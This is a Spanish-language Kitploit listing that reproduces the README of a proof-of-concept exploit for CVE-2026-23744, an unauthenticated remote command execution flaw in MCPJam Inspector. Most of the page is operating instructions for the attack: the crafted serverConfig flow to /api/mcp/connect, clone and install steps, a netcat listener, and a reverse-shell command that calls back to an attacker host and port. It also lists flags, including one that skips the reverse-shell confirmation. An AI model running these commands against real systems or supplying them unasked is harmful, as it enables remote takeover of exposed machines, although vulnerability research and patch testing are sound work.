Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23744 — Prueba de concepto de ejecución remota de código sin autenticación para CVE-2026-23744 dirigida a MCPJam Inspector. Genera payloads MCP serverConfig diseñados para explotar el endpoint /api/mcp/connect con soporte de reverse shell y depuración en seco (dry-run). | Kitploit
Herramientas/GitHubGitHub/ozcanpng/cve-2026-23744
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso Remoto
GitHubozcanpng/cve-2026-23744

CVE-2026-23744

Prueba de concepto de ejecución remota de código sin autenticación para CVE-2026-23744 dirigida a MCPJam Inspector. Genera payloads MCP serverConfig diseñados para explotar el endpoint /api/mcp/connect con soporte de reverse shell y depuración en seco (dry-run).

hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CVE-2026-23744 — MCPJam Inspector RCE no autenticado

PoC de ejecución remota de código no autenticada para CVE-2026-23744. MCPJam Inspector 1.4.2 y versiones anteriores exponen funcionalidad a través de /api/mcp/connect que puede lanzar un comando de servidor MCP controlado por el atacante sin autenticación.

Solo para pruebas autorizadas e investigación. No lo utilices contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.


Qué hace

root@kitploit:~
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
  1. Construye un payload serverConfig de MCP manipulado.
  2. Apunta al endpoint no autenticado /api/mcp/connect.
  3. Lanza un comando configurado a través de bash -c.
  4. Admite validación segura de comandos y payloads de reverse shell.
  5. Proporciona modos dry-run/debug para inspeccionar el payload antes de enviar tráfico.

Capturas de pantalla

Configuración de reverse shell

Configuración de reverse shell

Payload de conexión MCPJam

Payload de conexión MCPJam

Shell recibida

Shell recibida


Instalación

root@kitploit:~
git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt

Uso

Prueba de comando seguro

root@kitploit:~
python3 CVE-2026-23744.py \
  --url http://127.0.0.1:3000 \
  --cmd 'id'

Reverse shell

Primero inicia un listener:

root@kitploit:~
rlwrap nc -lvnp 4444

Después ejecuta:

root@kitploit:~
python3 CVE-2026-23744.py \
  --url http://127.0.0.1:3000 \
  --reverse-shell \
  --lhost 10.10.16.53 \
  --lport 4444

Opciones útiles:

root@kitploit:~
--cmd COMMAND       Command to execute (default: id)
--server-id VALUE   serverId value in the crafted MCP config (default: pwn)
--dry-run           Build payload flow without sending the HTTP request
--debug             Print endpoint and JSON payload
--verify-tls        Verify HTTPS certificates
--timeout SECONDS   HTTP timeout in seconds (default: 8)
--yes               Skip reverse-shell confirmation prompt

Productos afectados

ProductoVersión afectadaAcceso requeridoImpacto
MCPJam Inspector<= 1.4.2NingunoEjecución remota de comandos como el usuario del proceso de MCPJam Inspector

El problema es especialmente crítico cuando MCPJam Inspector escucha en 0.0.0.0, lo que permite que hosts remotos alcancen el servicio de desarrollo.


Notas

  • El PoC envía un payload JSON a /api/mcp/connect.
  • El comando se pasa a través de serverConfig.command y serverConfig.args.
  • Prefiere usar --cmd para una validación segura antes de intentar una reverse shell.
  • Usa --dry-run --debug para inspeccionar la solicitud generada sin tocar un objetivo.
  • La versión 1.4.3 contiene el parche oficial según NVD.

Referencias

  • NVD — CVE-2026-23744
  • GitHub Security Advisory — GHSA-232v-j27c-5pp6
  • Commit del parche
  • MCPJam Inspector

Autor del PoC

ozcanpng — github.com/ozcanpng — ozcanpng.dev

Descargar herramienta